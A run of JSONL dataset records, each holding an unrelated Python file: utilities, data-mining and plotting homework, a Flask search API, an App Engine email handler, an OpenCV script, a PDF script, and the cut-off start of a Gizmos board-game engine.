following disclaimer in the documentation and/or other materials provided with the\ndistribution.\n\nNeither the name of the copyright holder nor the names of its contributors may be used to endorse\nor promote products derived from this software without specific prior written permission.\n\nRedistribution of this software, without modification, must refer to the software by the same\ndesignation. Redistribution of a modified version of this software (i) may not refer to the\nmodified version by the same designation, or by any confusingly similar designation, and\n(ii) must refer to the underlying software originally provided by Alliance as “URBANopt”. Except\nto comply with the foregoing, the term “URBANopt”, or any confusingly similar designation may\nnot be used to refer to any modified version of this software or any modified version of the\nunderlying software originally provided by Alliance without the prior written consent of Alliance.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR\nIMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR\nCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\nOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n****************************************************************************************************\n\"\"\"\n\nimport logging\nimport os\nimport shutil\nfrom uuid import uuid4\n\n_log = logging.getLogger(__name__)\n\n\ndef copytree(src, dst, symlinks=False, ignore=None):\n \"\"\"\n Alternate version of copytree that will work if the directory already exists (use instead of shutil)\n \"\"\"\n for item in os.listdir(src):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s):\n shutil.copytree(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n\nclass ModelicaPath(object):\n \"\"\"\n Class for storing Modelica paths. This allows the path to point to\n the model directory, resources, and scripts directory.\n \"\"\"\n\n def __init__(self, name, root_dir, overwrite=False):\n \"\"\"\n Create a new modelica-based path with name of 'name'\n\n :param name: Name to create\n \"\"\"\n self.name = name\n self.root_dir = root_dir\n self.overwrite = overwrite\n\n # create the directories\n if root_dir is not None:\n check_path = os.path.join(self.files_dir)\n self.clear_or_create_path(check_path)\n check_path = os.path.join(self.resources_dir)\n self.clear_or_create_path(check_path)\n check_path = os.path.join(self.scripts_dir)\n self.clear_or_create_path(check_path)\n\n def clear_or_create_path(self, path):\n if os.path.exists(path):\n if not self.overwrite:\n raise Exception(\"Directory already exists and overwrite is false for %s\" % path)\n else:\n shutil.rmtree(path)\n os.makedirs(path, exist_ok=True)\n\n @property\n def files_dir(self):\n \"\"\"\n Return the path to the files (models) for the specified ModelicaPath. 
This path does not include the\n trailing slash.\n\n :return: string, path to where files (models) are stored, without trailing slash\n \"\"\"\n if self.root_dir is None:\n return self.files_relative_dir\n else:\n return os.path.join(self.root_dir, self.name)\n\n @property\n def resources_relative_dir(self):\n \"\"\"\n Return the relative resource directory instead of the full path. This is useful when replacing\n strings within modelica files which are relative to the package.\n\n :return: string, relative resource's data path\n \"\"\"\n return os.path.join(\"Resources\", \"Data\", self.name)\n\n @property\n def scripts_relative_dir(self, platform='Dymola'):\n \"\"\"Return the scripts directory that is in the resources directory. This only returns the\n relative directory and is useful when replacing string values within Modelica files.\n\n :return: string, relative scripts path\n \"\"\"\n return os.path.join(\"Resources\", \"Scripts\", self.name, platform)\n\n @property\n def files_relative_dir(self):\n \"\"\"Return the path to the files relative to the project name.\"\"\"\n return os.path.join(self.name)\n\n @property\n def resources_dir(self):\n \"\"\"\n Return the path to the resources directory for the specified ModelicaPath. This path does not include\n the trailing slash.\n\n :return: string, path to where resources are stored, without trailing slash.\n \"\"\"\n if self.root_dir is None:\n return self.resources_relative_dir\n else:\n return os.path.join(self.root_dir, self.resources_relative_dir)\n\n @property\n def scripts_dir(self):\n \"\"\"\n Return the path to the scripts directory (in the resources dir) for the specified ModelicaPath.\n This path does not include the trailing slash.\n\n :return: string, path to where scripts are stored, without trailing slash.\n \"\"\"\n if self.root_dir is None:\n return self.scripts_relative_dir\n else:\n return os.path.join(self.root_dir, self.scripts_relative_dir)\n\n\ndef simple_uuid():\n \"\"\"Generates a simple string uuid\n\n :return: string, uuid\n \"\"\"\n return str(uuid4()).split(\"-\")[0]\n","sub_path":"geojson_modelica_translator/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"251054510","text":"import pandas as pd\nimport time\n# 导入数据\ndata = pd.read_csv('Market_Basket_Optimisation.csv',header = None)\n# 补全空值\ndata = data.fillna('')\n# 显示所有列\npd.set_option('max_columns',None)\n\n\n# 基于efficient_apriori判断关联规则\ndef rule1(s1,c1):\n from efficient_apriori import apriori\n # 计算时间\n start = time.time()\n\n # 数据格式转化\n transactions = []\n for i in range(data.shape[0]):\n temp_set = set()\n for j in data.columns:\n if data[j][i] != '':\n temp_set.add(data[j][i])\n transactions.append(temp_set)\n # print(transactions)\n\n # 挖掘频繁项集和关联规则\n itemsets ,rules = apriori(transactions, min_support = s1, min_confidence = c1)\n print('频繁项集:', itemsets)\n print('关联规则:', rules)\n end = time.time()\n print('用时1:',end-start)\n\n\n# 基于mlxtend判断关联规则\ndef rule2(s2):\n from mlxtend.frequent_patterns import apriori\n from mlxtend.frequent_patterns import association_rules\n # 计算时间\n start = time.time()\n\n # 数据格式转化\n # 1)将每行数据都放入一列,并用'-'分隔\n data['total'] = data[data.columns[:]].apply(lambda x: '-'.join(x.dropna()),axis=1)\n # 2)利用get_dummies建立one-hot编码\n data_ = data.drop(data.columns[:21],axis=1).join(data.total.str.get_dummies(sep='-'))\n\n # 挖掘频繁项集\n frequent_itemsets = apriori(data_, min_support = s2, use_colnames=True)\n # 
按支持度大小,降序排列\n frequent_itemsets = frequent_itemsets.sort_values(by = 'support',ascending=False)\n print(\"频繁项集:\", frequent_itemsets)\n # 求关联规则,选取提升度为度量选项\n rules = association_rules(frequent_itemsets, metric=\"lift\", min_threshold=1)\n # 按提升度大小,降序排序\n rules = rules.sort_values(by = 'lift',ascending=False)\n print(\"关联规则:\",rules)\n\n end = time.time()\n print(\"用时2:\", end - start)\n\n\ndef main():\n # 用户自定义支持度及置信度\n s1 = float(input('\"rule1支持度\"设定为:',))\n c1 = float(input('\"rule1置信度\"设定为:',))\n rule1(s1,c1)\n print('-' * 50)\n s2 = float(input('\"rule2置信度\"设定为:',))\n rule2(s2)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"L4/homework 4.py","file_name":"homework 4.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"130847367","text":"from flask import Blueprint, request, send_file, Response\nfrom services.DBConn import db\nimport api.AuthorizationAPI\nfrom bson.json_util import dumps\nimport json\n\n\nsearch_api = Blueprint('search_api', __name__)\nuserDB = db.users\nlistingDB = db.listings\n\n\n@search_api.route(\"\", methods=['GET'])\n@api.AuthorizationAPI.requires_auth\ndef searchListings():\n query = request.args.get('query') # /search?query=\n try:\n listings = dumps(listingDB.find({'item': {'$regex': query, \"$options\": 'i'}}))\n if listings is None:\n return json.dumps({'error': \"Searched item not found: \"})\n else:\n return listings\n except Exception as e:\n print(e)\n return json.dumps({'error': \"Server error regex searching the database.\", 'code': 123})\n","sub_path":"api/SearchAPI.py","file_name":"SearchAPI.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"240980066","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 2 16:09:14 2018\r\n\r\n@author: 74286\r\n\"\"\"\r\n\r\n\r\n# 垂直条形图\r\n\r\nimport matplotlib.pyplot as plt #导入绘图模块\r\nGDP=[12406.8,13908.57,9386.87,9143.64] #构建数据GDP\r\nplt.rcParams['font.sans-serif']=['Microsoft YaHei'] #处理中文乱码\r\nplt.rcParams['axes.unicode_minus']=False\r\n#bar函数指定了条形图的x轴、y轴值,设置x轴刻度标签为水平居中\r\n#条形图的填充色color为铁蓝色,同时设置透明度alpha为0.8\r\nplt.bar(range(4),GDP,align='center',color='steelblue',alpha=0.8) #绘图\r\nplt.ylabel('GDP') #添加轴标签\r\nplt.title('GDP data for four municipalities') #添加标题\r\nplt.xticks(range(4),['Beijing','Shanghai','Tianjin','Chongqing']) #添加刻度标签\r\nplt.ylim([5000,15000]) #设置Y轴刻度范围\r\nfor x,y in enumerate(GDP): #为每个条形图添加数值标签\r\n plt.text(x,y+100,'%s'%round(y,1),ha='center') \r\nplt.show() #显示图形\r\n\r\n# 水平条形图\r\n\r\nimport matplotlib.pyplot as plt #导入绘图模块\r\nprice=[39.5,39.9,45.4,38.9,33.34] #构建数据price\r\nplt.rcParams['font.sans-serif']=['Microsoft YaHei'] #处理中文乱码\r\nplt.rcParams['axes.unicode_minus']=False\r\nplt.barh(range(5),price,align='center',color='steelblue',alpha=0.8) #绘图\r\nplt.xlabel('price') #添加轴标签\r\nplt.title('the lowest price in different platform') #添加标题\r\nplt.yticks(range(5),['Amazon','DangDang','Chinese library','JD','Tmall']) #添加刻度标签\r\nplt.xlim([32,47]) #设置X轴的刻度范围\r\nfor x,y in enumerate(price): #为每个条形图添加数值标签\r\n plt.text(y+0.1,x,'%s'%y,va='center')\r\nplt.show() #显示图形\r\n\r\n# 垂直交错条形图\r\n\r\nimport matplotlib.pyplot as plt #导入绘图模块\r\nimport numpy as np\r\nY2016=[15600,12700,11300,4270,3620] #构建数据\r\nY2017=[17400,14800,12000,5200,4020]\r\nlabels=['Beijing','Shanghai','Hongkong','Shenzhen','Guangzhou']\r\nbar_width=0.45\r\nplt.rcParams['font.sans-serif']=['Microsoft YaHei'] 
#处理中文乱码\r\nplt.rcParams['axes.unicode_minus']=False\r\nplt.bar(np.arange(5),Y2016,label='2016',color='steelblue',alpha=0.8,width=bar_width)\r\nplt.bar(np.arange(5)+bar_width,Y2017,label='2017',color='indianred',alpha=0.8,width=bar_width)\r\nplt.xlabel('Top 5 Cities') #添加轴标签\r\nplt.ylabel('Family number') \r\nplt.title('the distribution of billionaire family in Top 5 cities') #添加标题\r\nplt.xticks(np.arange(5)+bar_width,labels) #添加刻度标签\r\nplt.ylim([2500,19000]) #设置Y轴的刻度范围\r\nfor x2016,y2016 in enumerate(Y2016): #为每个条形图添加数值标签\r\n #plt.text(x2016,y2016+200,'%s'%y2016) # ??? 数字显示错位\r\n #可以以下修正语句修正错位\r\n plt.text(x2016-1,y2016+200,' %s'%y2016) \r\nfor x2017,y2017 in enumerate(Y2017):\r\n plt.text(x2017,y2017+200,' %s'%y2017)\r\nplt.legend() #显示图例\r\nplt.show() #显示图形\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Python Code/matplotlib_pyplot_bar.py","file_name":"matplotlib_pyplot_bar.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"36602596","text":"from functools import wraps\n\n\ndef type_logger(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n list_ans = [f'{i} : {type(i)},' for i in args]\n list_kans = [f'{i} : {type(i)},' for i in kwargs]\n\n if len(list_ans) > 0 and len(list_kans) == 0: # удаляем лишнюю запятую в конце для красоты\n list_ans[-1] = list_ans[-1][:-1]\n elif len(list_kans) > 0:\n list_kans[-1] = list_kans[-1][:-1]\n\n print(*list_ans, *list_kans)\n dec_func = func(*args, **kwargs)\n print(f'{func.__name__}({dec_func} : {type(dec_func)})')\n return dec_func\n\n return wrapper\n\n\n@type_logger\ndef calc_cube(x, y, z, lst, **arg2):\n return x ** 3\n\n\n@type_logger\ndef calc_cube2():\n return 10 ** 3\n\n\ncalc_cube(2, 4, 6, [1, 2, 3], arg1='123', arg2='12243')\ncalc_cube2()\n","sub_path":"Nikolskiy_Aleksey_dz_8/task8_3.py","file_name":"task8_3.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"647880939","text":"import logging, yaml\nfrom models import store_email_and_attachment\n\nfrom django.utils import simplejson as json\nfrom google.appengine.ext import webapp, deferred\nfrom google.appengine.api import mail\n\nsettings = yaml.load(open('settings.yaml'))\n\ndef safe_dict(d): \n \"\"\"\n Recursively clone json structure with UTF-8 dictionary keys\n http://bugs.python.org/issue2646\n \"\"\" \n if isinstance(d, dict): \n return dict([(k.encode('utf-8'), safe_dict(v)) for k,v in d.iteritems()]) \n elif isinstance(d, list): \n return [safe_dict(x) for x in d] \n else: \n return d\n\ndef email(body):\n email = json.loads(body)\n logging.info(email)\n mail_message = mail.EmailMessage(**safe_dict(email))\n mail_message.send()\n\n #The below stores the email and any attachments\n stored_email = store_email_and_attachment(mail_message,\n\t\t\t\t\t\t\t\t\t\t\tis_from_external=False)\n if not stored_email:\n logging.error(\"Failed to save message: %s\", \n message.original.as_string(True))\n\n\nclass OutboundHandler(webapp.RequestHandler):\n\n def post(self, *args):\n api_key = self.request.headers.get('Authorization')\n \n if api_key != settings['api_key']:\n logging.error(\"Invalid API key: \" + str(api_key))\n self.error(401)\n return\n \n deferred.defer(email, self.request.body, 
_queue='outbound')\n","sub_path":"outbound.py","file_name":"outbound.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"415576030","text":"import cv2 #disponibiza as funções do opencv \nimport numpy as np\nfrom scipy import misc, ndimage\nfrom skimage import exposure, morphology, img_as_float, filters, util, measure\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport PIL.ImageOps\n\ndef maiorObjeto(grayscaled,threshold):\n \n im_r,tmp = ndimage.label(threshold)\n \n props = measure.regionprops(im_r,grayscaled)\n objMaior = 0\n img_m = 0\n for i in range(0, im_r.max()):\n im_t = np.zeros(im_r.shape)\n \n im_t [im_r == i+1] = 1\n \n \n if props[i].area > objMaior:\n objMaior = props[i].area\n img_m = im_t\n \n return img_m\n\ndef filtroRGB(src,r,g,b):\n if r == 0:\n src[:,:,2] = 0 #elimina o vermelho\n if g == 0:\n src[:,:,1] = 0 #elimina o verde\n if b == 0:\n src[:,:,0] = 0 #elimina o azul\n \ndef show_image(): \n img = cv2.imread('planta2.png')\n \n filtroRGB(img,0,1,0)\n verde_inferior = np.array([0,127,0])\n verde_superior = np.array([255,255,255])\n mascara = cv2.inRange(img, verde_inferior, verde_superior)\n res = cv2.bitwise_and(img,img, mask= mascara) \n\n grayscaled = cv2.cvtColor(res,cv2.COLOR_BGR2GRAY)\n \n median = cv2.medianBlur(grayscaled,3)\n \n retval, threshold = cv2.threshold(median, 10, 255, cv2.THRESH_OTSU)\n \n elemEstr = np.array([[0,1,0],\n [1,1,1],\n [0,1,0]])\n \n kernel3 = np.ones((3,3),np.uint8)\n kernel5 = np.ones((5,5),np.uint8)\n \n #np.ones((3,3))\n selem = morphology.disk(3)\n \n #img_close = morphology.binary_closing(grayscaled, elemEstr)\n #img_top_hat = morphology.white_tophat(img_close,selem)\n \n #img_open = morphology.binary_opening(img_top_hat, elemEstr)\n \n #img_holes = morphology.remove_small_objects(img_open)\n \n \n \n #fechamento\n #transformacion = cv2.morphologyEx(grayscaled,cv2.MORPH_CLOSE,kernel)\n \n #tophat\n #topHat = cv2.morphologyEx(grayscaled,cv2.MORPH_TOPHAT,kernel5)\n \n #abertura\n abertura = cv2.morphologyEx(grayscaled,cv2.MORPH_OPEN,kernel3)\n \n #dilatação\n dilatacao = cv2.dilate(abertura,kernel5,iterations = 1)\n \n #erosao\n erosao = cv2.erode(dilatacao,kernel3,iterations = 1)\n \n #linha\n #img_tra = erosao\n #linha = cv2.dilate(img_tra,kernel3,iterations = 1) - cv2.erode(img_tra,kernel3,iterations = 1)\n \n plt.figure()\n img_print = erosao\n img_maior = maiorObjeto(grayscaled,img_print)\n #plt.imshow(maiorObjeto(grayscaled,img_open))\n misc.imsave('teste.tif',img_print)\n misc.imsave('teste_maior.tif',img_maior)\n \n \n plt.subplot(1, 2, 1)\n plt.imshow(img_print, cmap='gray')\n \n plt.subplot(1, 2, 2)\n plt.imshow(img_maior, cmap='gray')\n\n plt.show()\n \n \ndef main():\n show_image()\n return 0\n \nif __name__ == '__main__':\n main()","sub_path":"Teste2/testeOpenCV.py","file_name":"testeOpenCV.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"160689112","text":"# /usr/bin/python\n# coding=utf-8\n\nfrom pdfrw import PdfReader, PdfWriter\n\n# Путь до автореферата\nsynopsis_path = '../synopsis.pdf'\n# Путь до титульника Научного Доклада ГИА (должно быть две страницы: титульник и пустая)\ngia_title_path = './gia_title.pdf'\n\n\nsynopsis = PdfReader(synopsis_path)\ngia_title = PdfReader(gia_title_path)\n\nsci_rep = PdfWriter()\n\n\nfor i, p in enumerate(synopsis.pages):\n if i < 2:\n 
sci_rep.addpage(gia_title.pages[i])\n else:\n sci_rep.addpage(p)\n\n\n# Сохранение результата\nsci_rep.write('./sci_rep.pdf')\n\n","sub_path":"gia/make_science_report.py","file_name":"make_science_report.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"459532663","text":"import random\nfrom card import *\nimport itertools\n\nclass Gizmos:\n\tdef __init__(self, card_data, init=True):\n\t\tself.card_data = card_data\n\n\t\tif init:\n\t\t\tself.reset()\n\n\tdef add_to_built(self, card):\n\t\tcard_d = self.card_data.cards[card]\n\t\tself.built_by_eff[card_d.eff] += [card]\n\t\tself.card_vp += card_d.points\n\n\tdef draw_card_from_tier(self, tier):\n\t\tdeck = self.tier_decks[tier]\n\t\tif len(deck) == 0:\n\t\t\treturn None\n\t\tif self.simulation:\n\t\t\tcard_i = random.randint(0, len(deck) - 1)\n\t\t\treturn deck.pop(card_i)\n\t\treturn deck.pop()\n\n\tdef get_random_hidden(self):\n\t\tcumsum = list(itertools.accumulate(self.hidden_marbles))\n\t\trand = random.randint(0, cumsum[-1] - 1)\n\t\tfor i, thres in enumerate(cumsum):\n\t\t\tif rand < thres:\n\t\t\t\treturn i\n\t\traise Exception('out of marbles')\n\n\tdef dispense_marble(self):\n\t\tif self.visible_marble is not None:\n\t\t\tself.pickable_marbles[self.visible_marble] += 1\n\n\t\tcol = self.get_random_hidden()\n\t\tself.visible_marble = col\n\t\tself.hidden_marbles[col] -= 1\n\n\tdef reset(self):\n\t\tself.illegal_move = False\n\t\tself.simulation = False\n\n\t\tself.tier_decks = [[card.idnum for card in cards] for cards in self.card_data.tiers]\n\t\tfor i in range(4):\n\t\t\trandom.shuffle(self.tier_decks[i])\n\t\tself.tier_decks[3] = self.tier_decks[3][:16]\n\n\t\tself.tier_showns = [[], [None, None, None, None], [None, None, None], [None, None]]\n\t\tfor tier in range(4):\n\t\t\tfor i in range(len(self.tier_showns[tier])):\n\t\t\t\tself.tier_showns[tier][i] = self.draw_card_from_tier(tier)\n\n\t\tself.built_by_eff = [[] for eff in CARD_EFFECTS]\n\t\tself.archive = []\n\n\t\tself.hidden_marbles = [13, 13, 13, 13]\n\t\tself.pickable_marbles = [0, 0, 0, 0]\n\t\tself.visible_marble = None\n\n\t\tfor i in range(7):\n\t\t\tself.dispense_marble()\n\n\t\tself.inv_marbles = [0, 0, 0, 0]\n\n\t\tself.marble_cap = 5\n\t\tself.file_cap = 1\n\t\tself.research_cap = 3\n\n\t\tself.card_vp = 0\n\t\tself.vp = 0\n\n\t\tself.add_to_built(self.card_data.tiers[0][0].idnum)\n\n\t\tself.turn = 0\n\t\tself.reset_turn()\n\n\tdef reset_turn(self):\n\t\tself.pending_generic = 1\n\t\tself.pending_picks = 0\n\t\tself.pending_rands = 0\n\t\tself.tapped_by_eff = [[0 for card in cards] for cards in self.built_by_eff]\n\n\tdef sim_clone(self):\n\t\togame = Gizmos(self.card_data, init=False)\n\t\togame.illegal_move = self.illegal_move\n\t\togame.simulation = True\n\t\togame.tier_decks = [deck.copy() for deck in self.tier_decks]\n\t\togame.tier_showns = [showns.copy() for showns in self.tier_showns]\n\t\togame.built_by_eff = [cards.copy() for cards in self.built_by_eff]\n\t\togame.archive = self.archive.copy()\n\t\togame.hidden_marbles = self.hidden_marbles.copy()\n\t\togame.pickable_marbles = self.pickable_marbles.copy()\n\t\togame.visible_marble = self.visible_marble\n\t\togame.inv_marbles = self.inv_marbles.copy()\n\t\togame.marble_cap = self.marble_cap\n\t\togame.file_cap = self.file_cap\n\t\togame.research_cap = self.research_cap\n\t\togame.card_vp = self.card_vp\n\t\togame.vp = self.vp\n\t\togame.turn = self.turn\n\t\togame.pending_generic = 
self.pending_generic\n\t\togame.pending_picks = self.pending_picks\n\t\togame.pending_rands = self.pending_rands\n\t\togame.tapped_by_eff = [tapped.copy() for tapped in self.tapped_by_eff]\n\t\treturn ogame\n\n\tdef get_i_card_tapped_it(self, eff):\n\t\t# note that tapped might be shorter than built if a card is\n\t\t# just built -- ignore that card in this iterator\n\t\treturn enumerate(zip(self.built_by_eff[eff], self.tapped_by_eff[eff]))\n\n\tdef card_has_effcol(self, card, col):\n\t\tcard_d = self.card_data.cards[card]\n\t\treturn (card_d.effcol1 is not None and card_d.effcol1 == col) or (card_d.effcol2 is not None and card_d.effcol2 == col)\n\n\t# API\n\tdef new_turn(self):\n\t\tself.reset_turn()\n\t\tself.turn += 1\n\n\tdef can_pick(self, col):\n\t\treturn self.pickable_marbles[col] > 0\n\n\tdef pick_is_legal(self, col):\n\t\tif self.pending_generic <= 0 and self.pending_picks <= 0:\n\t\t\treturn False\n\t\tif sum(self.inv_marbles) >= self.marble_cap:\n\t\t\treturn False\n\t\tif self.pickable_marbles[col] <= 0:\n\t\t\treturn False\n\t\treturn True\n\n\t# API\n\tdef pick(self, col):\n\t\tif not self.pick_is_legal(col):\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tif self.pending_picks == 0:\n\t\t\tself.pending_generic -= 1\n\t\telse:\n\t\t\tself.pending_picks -= 1\n\n\t\tself.pickable_marbles[col] -= 1\n\t\tself.dispense_marble()\n\t\tself.inv_marbles[col] += 1\n\n\t\tp2r_i = CARD_EFFECTS.index('p2r')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(p2r_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.pending_rands += 1\n\t\t\t\tself.tapped_by_eff[p2r_i][i] += 1\n\n\t\tpp2r_i = CARD_EFFECTS.index('pp2r')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(pp2r_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.pending_rands += 1\n\t\t\t\tself.tapped_by_eff[pp2r_i][i] += 1\n\n\tdef draw_marble_is_legal(self):\n\t\t# assume there are enough marbles to draw\n\t\tif self.pending_rands <= 0:\n\t\t\treturn False\n\t\tif sum(self.inv_marbles) >= self.marble_cap:\n\t\t\treturn False\n\t\treturn True\n\n\t# API\n\tdef draw_marble(self):\n\t\tif not self.draw_marble_is_legal():\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tself.pending_rands -= 1\n\n\t\tcol = self.get_random_hidden()\n\t\tself.hidden_marbles[col] -= 1\n\t\tself.inv_marbles[col] += 1\n\n\tdef file_shown_is_legal(self, tier, index):\n\t\tif self.pending_generic <= 0:\n\t\t\treturn False\n\t\tif self.tier_showns[tier][index] is None:\n\t\t\treturn False\n\t\tif len(self.archive) >= self.file_cap:\n\t\t\treturn False\n\t\treturn True\n\n\t# API\n\tdef file_shown(self, tier, index):\n\t\tif not self.file_shown_is_legal(tier, index):\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tself.pending_generic -= 1\n\n\t\tself.file_card(self.tier_showns[tier][index])\n\n\tdef file_card(self, card_to_file):\n\t\tf2p_i = CARD_EFFECTS.index('f2p')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(f2p_i):\n\t\t\tif tapped < 1:\n\t\t\t\tself.pending_picks += 1\n\t\t\t\tself.tapped_by_eff[f2p_i][i] += 1\n\n\t\tf2r_i = CARD_EFFECTS.index('f2r')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(f2r_i):\n\t\t\tif tapped < 1:\n\t\t\t\tself.pending_rands += 1\n\t\t\t\tself.tapped_by_eff[f2r_i][i] += 1\n\n\t\tcard = card_to_file\n\n\t\tself.archive += [card]\n\n\tdef can_build(self, card):\n\t\tcard_d = self.card_data.cards[card]\n\t\treturn self.inv_marbles[card_d.col] >= card_d.cost\n\n\tdef build(self, card_to_build):\n\t\tcard_d = self.card_data.cards[card_to_build]\n\t\tcol = 
card_d.col\n\n\t\tb2p_i = CARD_EFFECTS.index('b2p')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(b2p_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.pending_picks += 1\n\t\t\t\tself.tapped_by_eff[b2p_i][i] += 1\n\n\t\tbb2p_i = CARD_EFFECTS.index('bb2p')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(bb2p_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.pending_picks += 1\n\t\t\t\tself.tapped_by_eff[bb2p_i][i] += 1\n\n\t\tb2v_i = CARD_EFFECTS.index('b2v')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(b2v_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.vp += 1\n\t\t\t\tself.tapped_by_eff[b2v_i][i] += 1\n\n\t\tbb2v_i = CARD_EFFECTS.index('bb2v')\n\t\tfor i, (card, tapped) in self.get_i_card_tapped_it(bb2v_i):\n\t\t\tif tapped < 1 and self.card_has_effcol(card, col):\n\t\t\t\tself.vp += 1\n\t\t\t\tself.tapped_by_eff[bb2v_i][i] += 1\n\n\t\tcard = card_to_build\n\n\t\tself.inv_marbles[card_d.col] -= card_d.cost\n\t\tself.add_to_built(card)\n\t\tif card_d.eff == CARD_EFFECTS.index('upg110'):\n\t\t\tself.marble_cap += 1\n\t\t\tself.file_cap += 1\n\t\tif card_d.eff == CARD_EFFECTS.index('upg101'):\n\t\t\tself.marble_cap += 1\n\t\t\tself.research_cap += 1\n\t\tif card_d.eff == CARD_EFFECTS.index('upg212'):\n\t\t\tself.marble_cap += 2\n\t\t\tself.file_cap + 1\n\t\t\tself.research_cap += 2\n\n\tdef build_from_file_is_legal(self, index):\n\t\tif self.pending_generic <= 0:\n\t\t\treturn False\n\t\tif index >= len(self.archive):\t\n\t\t\treturn False\n\t\tif not self.can_build(self.archive[index]):\n\t\t\treturn False\n\n\t# API\n\tdef build_from_file(self, index):\n\t\tif not self.build_from_file_is_legal(index):\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tself.pending_generic -= 1\n\n\t\tbff2pp_i = CARD_EFFECTS.index('bff2pp')\n\t\tfor i in range(len(self.built_by_eff[bff2pp_i])):\n\t\t\tcard = self.built_by_eff[bff2pp_i][i]\n\t\t\tif self.tapped_by_eff[bff2pp_i][i] < 1:\n\t\t\t\tself.pending_picks += 2\n\t\t\t\tself.tapped_by_eff[bff2pp_i][i] += 1\n\n\t\tbuild(self.archive.pop(index))\n\n\tdef build_from_shown_is_legal(self, tier, index):\n\t\tif self.pending_generic <= 0:\n\t\t\treturn False\n\t\tif self.tier_showns[tier][index] is None:\n\t\t\treturn False\n\t\tif not self.can_build(self.tier_showns[tier][index]):\n\t\t\treturn False\n\t\treturn True\n\n\t# API\n\tdef build_from_shown(self, tier, index):\n\t\tif not self.build_from_shown_is_legal(tier, index):\n\t\t\tillegal_move = True\n\t\t\treturn\n\t\tself.pending_generic -= 1\n\n\t\tself.build(self.tier_showns[tier][index])\n\t\tself.tier_showns[tier][index] = self.draw_card_from_tier(tier)\n\n\tdef get_legal_moves(self):\n\t\tlegal_moves = []\n\n\t\tlegal_moves += [Move(MOVE_TYPES.index('new_turn'))]\n\t\tif self.draw_marble_is_legal():\n\t\t\tlegal_moves += [Move(MOVE_TYPES.index('draw_marble'))]\n\t\tfor i in range(4):\n\t\t\tif self.pick_is_legal(i):\n\t\t\t\tlegal_moves += [Move(MOVE_TYPES.index('pick'), col=i)]\n\t\tfor tier in range(4):\n\t\t\tfor i in range(len(self.tier_showns[tier])):\n\t\t\t\tif self.file_shown_is_legal(tier, i):\n\t\t\t\t\tlegal_moves += [Move(MOVE_TYPES.index('file_shown'), tier=tier, index=i)]\n\t\t\t\tif self.build_from_shown_is_legal(tier, i):\n\t\t\t\t\tlegal_moves += [Move(MOVE_TYPES.index('build_from_shown'), tier=tier, index=i)]\n\t\tfor i in range(len(self.archive)):\n\t\t\tif 